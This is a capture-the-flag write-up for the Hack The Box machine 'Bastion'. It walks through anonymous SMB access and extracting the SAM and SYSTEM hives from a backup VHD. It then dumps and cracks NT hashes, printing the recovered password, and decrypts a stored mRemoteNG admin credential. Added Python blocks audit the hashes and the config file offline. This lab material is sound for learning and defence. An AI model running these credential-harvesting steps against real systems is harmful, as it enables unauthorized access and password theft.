Introduction
This box is Bastion from Hack The Box, rated Easy.
Techniques used:
- Mount smb to kali
- Extract password from SAM and SYSTEM (.vhd file)
- Insecure mRemoteNG
Attacker: 10.10.16.2
Target: 10.10.10.134
Recon
- nmap
sudo nmap -sV -sC 10.10.10.134
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-05-09T07:55:56+02:00
| smb2-time:
| date: 2024-05-09T05:56:00
|_ start_date: 2024-05-09T05:48:18
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: -44m56s, deviation: 1h09m16s, median: -4m57s
Looks like this one is about SMB.
- smbclient
First, list the available shares:
smbclient -N -L \\\\10.10.10.134\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
There is a Backups share:
smbclient -N \\\\10.10.10.134\\Backups
After connecting and browsing around, I found this path, which contains two .vhd files; download them with get.
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\>
Exploit
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
This file is large and took a long time to download, so let's look at this one first:
7z x 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
It segfaults right away.
Some files were extracted anyway, but there is no SAM or SYSTEM under Windows\System32\config.
The other file extracts fine, but there is nothing interesting in it.
After some searching I found this article:
https://infinitelogins.com/2020/12/11/how-to-mount-extract-password-hashes-vhd-files/
Following it, I tried mounting the vhd on kali:
sudo apt install libguestfs-tools -y
sudo mkdir /mnt/vhd
guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd
After that, /mnt/vhd is still empty; I suspect the download was incomplete from the start.
So I tried mounting the share directly from the target instead:
sudo mount -t cifs //10.10.10.134/backups /mnt/backups -o user=,password=
It worked!
Next, mount the vhd again:
sudo guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd
Copy SAM and SYSTEM out:
sudo cp vhd/Windows/System32/config/SAM ~/HTB/machine/Bastion
sudo cp vhd/Windows/System32/config/SYSTEM ~/HTB/machine/Bastion
Dump the password hashes:
samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
Throw the hash into crackstation to get L4mpje's password:
bureaulampje
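The dump above is in pwdump format: user, RID, LM hash, NT hash, with the LM field holding the "no LM hash" constant and the NT hash being an unsalted MD4 over the UTF-16-LE password. The following is an added example (not part of the original writeup) that a defender would run over a hive found in an exposed backup: it parses the three lines printed by samdump2 above, flags accounts whose NT hash is the empty-password value, and checks the rest against a small constructed candidate list by recomputing NT hashes offline. MD4 is implemented in pure Python because hashlib's md4 is frequently unavailable under OpenSSL 3; the candidate list and the `audit`/`parse_pwdump` helper names are my own.

```python
import struct

_MASK = 0xFFFFFFFF
# NT hash of the empty password: MD4 of zero bytes (the value shown for the disabled accounts above).
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4. Pure Python because hashlib's md4 is often missing under OpenSSL 3."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)

    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    # (function, word order, per-step shifts, round constant) for the three rounds
    rounds = (
        (f, list(range(16)), (3, 7, 11, 19), 0x00000000),
        (g, [(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13), 0x5A827999),
        (h, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = [a, b, c, d]
        for func, order, shifts, const in rounds:
            for i in range(16):
                t = (-i) % 4  # register updated in this step cycles a, d, c, b
                p, q, r = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
                v[t] = _rotl((v[t] + func(p, q, r) + x[order[i]] + const) & _MASK, shifts[i % 4])
        a, b, c, d = ((s + w) & _MASK for s, w in zip((a, b, c, d), v))
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16-LE encoding of the password (no salt)."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text: str) -> list:
    """Parse samdump2 / pwdump lines: [*disabled* ]user:rid:lmhash:nthash:::"""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        disabled = line.startswith("*disabled*")
        if disabled:
            line = line[len("*disabled*"):].strip()
        user, rid, lm, nt = line.split(":")[:4]
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(),
                        "nt": nt.lower(), "disabled": disabled})
    return entries


def audit(entries: list, candidates: list) -> dict:
    """Classify each account as ('empty', None), ('weak', candidate) or ('ok', None).

    The candidate list is hashed once and compared against the dump, so this is
    an offline comparison, never a login attempt against the host."""
    lookup = {nt_hash(p): p for p in candidates}
    result = {}
    for e in entries:
        if e["nt"] == EMPTY_NT_HASH:
            result[e["user"]] = ("empty", None)
        elif e["nt"] in lookup:
            result[e["user"]] = ("weak", lookup[e["nt"]])
        else:
            result[e["user"]] = ("ok", None)
    return result


# The three lines printed by samdump2 in the writeup above.
SAMDUMP_OUTPUT = """\
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
"""
# Constructed candidate list for the illustration.
CANDIDATES = ["Password1", "Welcome1", "bureaulampje"]

if __name__ == "__main__":
    for user, (status, hit) in audit(parse_pwdump(SAMDUMP_OUTPUT), CANDIDATES).items():
        print(f"{user:15} {status}" + (f" ({hit})" if hit else ""))
```

Because the NT hash is unsalted, one MD4 per candidate checks every account in the dump at once, which is exactly why a SAM/SYSTEM pair sitting in a world-readable backup share is as good as the passwords themselves.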
User shell obtained.
Privilege Escalation
No permission to run systeminfo, and with the permissions available I'm not sure which privilege escalation tricks apply.
However, there is mRemoteNG in Program Files (x86).
C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml contains the admin's password:
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" ......
It looks like base64, but decoding it gives garbage; after searching again I found this:
https://github.com/haseebT/mRemoteNG-Decrypt
This script decrypts the password.
After connecting with it, admin shell obtained.
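The reason the base64 above decodes to garbage is that mRemoteNG does not store the password itself but an encrypted blob: base64 of salt(16) || nonce(16) || AES-GCM ciphertext || tag(16), keyed from a master password that is a fixed default unless the user sets one. Below is an added example, not part of the writeup or of mRemoteNG, of the check a defender would run over a user's confCons.xml to find connections that carry stored credentials without decrypting anything. The sample file is constructed: the "DC" node is the one from the writeup with its Id and Password attributes joined back into single values, while the root attributes (EncryptionEngine, BlockCipherMode, KdfIterations, ConfVersion) and the second node are assumed for illustration; `audit_confcons`, `inspect_blob` and `nodes_with_stored_credentials` are my own names.

```python
import base64
import xml.etree.ElementTree as ET

# mRemoteNG (1.75+) password blob layout: salt(16) || nonce(16) || AES-GCM ciphertext || tag(16)
SALT_LEN, NONCE_LEN, TAG_LEN = 16, 16, 16

# Constructed sample: the "DC" node is the one from the writeup; root attributes and the
# second node are assumed for illustration.
SAMPLE_CONFCONS = """\
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General"
        Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain=""
        Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
        Hostname="127.0.0.1" />
  <Node Name="jump-no-creds" Type="Connection" Username="" Domain="" Password="" Hostname="192.0.2.10" />
</mrng:Connections>
"""


def inspect_blob(b64: str) -> dict:
    """Split a stored Password attribute into its parts without decrypting anything."""
    raw = base64.b64decode(b64)
    ct_len = len(raw) - (SALT_LEN + NONCE_LEN + TAG_LEN)
    return {
        "blob_bytes": len(raw),
        # GCM is length-preserving, so this equals the UTF-8 length of the stored password.
        "ciphertext_bytes": ct_len,
        "well_formed": ct_len > 0,
    }


def audit_confcons(xml_text: str) -> dict:
    """Summarise the cipher settings and every Connection node's credential state."""
    root = ET.fromstring(xml_text)
    report = {
        "engine": root.get("EncryptionEngine"),
        "mode": root.get("BlockCipherMode"),
        "kdf_iterations": int(root.get("KdfIterations", "0")),
        "nodes": [],
    }
    for node in root.iter("Node"):
        if node.get("Type") != "Connection":
            continue
        pw = node.get("Password", "")
        entry = {"name": node.get("Name"), "host": node.get("Hostname"),
                 "user": node.get("Username", ""), "stored_password": bool(pw)}
        if pw:
            entry.update(inspect_blob(pw))
        report["nodes"].append(entry)
    return report


def nodes_with_stored_credentials(report: dict) -> list:
    """Names of connections whose password is recoverable by anyone who can read the file."""
    return [n["name"] for n in report["nodes"] if n["stored_password"]]


if __name__ == "__main__":
    rep = audit_confcons(SAMPLE_CONFCONS)
    print(f"cipher: {rep['engine']}-{rep['mode']}, KDF iterations: {rep['kdf_iterations']}")
    for n in rep["nodes"]:
        print(n)
    print("stored credentials:", nodes_with_stored_credentials(rep))
```

For the "DC" node the blob decodes to 64 bytes, leaving 16 bytes of ciphertext, so the file reveals the stored password's length before any key is involved. The remediation this check points at is the one the box demonstrates the lack of: no saved passwords for privileged accounts in a per-user roaming profile, and a non-default master password if credentials must be stored at all.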